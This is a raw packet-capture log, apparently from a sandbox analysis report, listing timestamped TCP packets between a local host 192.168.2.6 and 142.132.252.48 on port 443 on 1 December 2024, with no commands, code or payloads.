                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.895153999 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.895179987 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.895199060 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.895230055 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.900070906 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.900098085 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.900238037 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.900249958 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.900706053 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.982453108 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.989298105 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.989320993 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.989383936 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.989399910 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.989468098 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.994525909 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.994544029 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.994602919 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.994602919 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.994613886 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:36.994663954 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.056674957 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.064671993 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.064697981 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.064790010 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.064800024 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.064904928 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.070286989 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.070319891 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.070374012 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.070413113 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.070493937 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.085273027 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.085299969 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.085341930 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.085381985 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.085397959 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.088675976 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.090267897 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.090286016 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.090353012 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.090353012 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.090370893 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.090434074 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.095916033 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.095933914 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.096004963 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.096019030 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.096664906 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.101581097 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.101603985 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.101660967 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.101675987 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.101690054 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.101741076 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.107327938 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.190759897 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.190782070 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.190846920 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.190869093 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.190896988 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.192665100 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.196034908 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.196053982 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.196119070 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.196132898 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.196671963 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.224184990 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.266015053 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.266037941 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.266241074 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.266241074 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.266263962 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.266339064 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.271671057 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.271691084 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.271816969 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.271816969 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.271836996 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.272701025 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.286205053 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.286228895 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.286319017 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.286319017 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.286345005 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.288695097 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.291743040 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.291759968 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.291856050 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.291876078 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.292682886 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.294163942 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.297492981 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.297513008 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.297574043 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.297574043 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.297611952 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.297801971 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.297801971 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.302510977 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.302529097 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.302619934 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.302640915 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.302699089 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.302699089 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.317734003 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.392411947 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.392448902 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.392564058 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.392577887 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.392656088 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.397584915 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.397608995 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.397664070 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.397679090 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.397746086 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.397746086 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.467190981 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.467223883 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.467339039 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.467361927 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.467411995 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.472894907 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.472980022 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.473527908 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.473584890 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.487421989 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.487449884 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.487584114 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.487612009 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.487725019 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.493113995 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.493140936 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.493206024 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.493232012 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.493277073 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.493277073 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.498716116 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.498743057 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.498806953 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.498823881 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.498838902 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.498873949 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.503734112 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.503755093 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.503828049 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.503849983 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.503910065 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.593895912 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.593925953 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.594006062 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.594019890 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.594042063 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.594063997 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.599090099 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.599117994 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.599234104 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.599234104 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.599241018 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.599277973 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.668380022 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.668411970 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.668471098 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.668484926 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.668550014 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.668550014 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.674155951 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.674179077 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.674287081 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.674303055 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.674380064 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.688750029 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.688777924 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.689107895 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.689124107 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.689166069 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.694525003 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.694547892 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.694678068 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.694694042 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.694755077 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.700054884 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.700090885 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.700189114 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.700210094 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.700238943 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.700253963 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.705015898 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.705039024 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.705101013 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.705117941 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.705189943 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.794950008 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.794975996 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.795098066 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.795109987 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.795170069 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.800189018 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.800215006 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.800302029 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.800319910 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.800365925 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.809624910 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.869721889 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.869750023 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.869843960 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.869853973 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.869893074 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.875375986 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.875400066 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.875453949 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.875462055 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.875550985 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.890017986 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.890036106 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.890132904 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.890141010 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.890199900 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.895602942 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.895627022 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.895668983 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.895674944 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.895713091 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.895723104 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.900492907 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.901288033 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.901319981 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.901410103 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.901410103 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.901417017 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.901452065 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.906940937 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.906960011 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.907016039 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.907021999 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.907130003 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.907130003 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.996711969 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.996738911 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.996885061 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.996895075 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:37.996973991 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.001627922 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.001652956 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.001687050 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.001693010 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.001765013 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.001765013 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.071682930 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.071710110 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.071748972 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.071758032 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.071809053 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.076627970 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.076651096 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.076713085 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.076719999 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.076751947 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.076787949 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.091854095 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.091876984 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.091919899 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.091926098 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.091988087 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.096812963 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.096828938 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.096889019 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.096894979 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.096956015 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.102442026 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.102456093 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:38.102560997 CET49721443192.168.2.6142.132.252.48
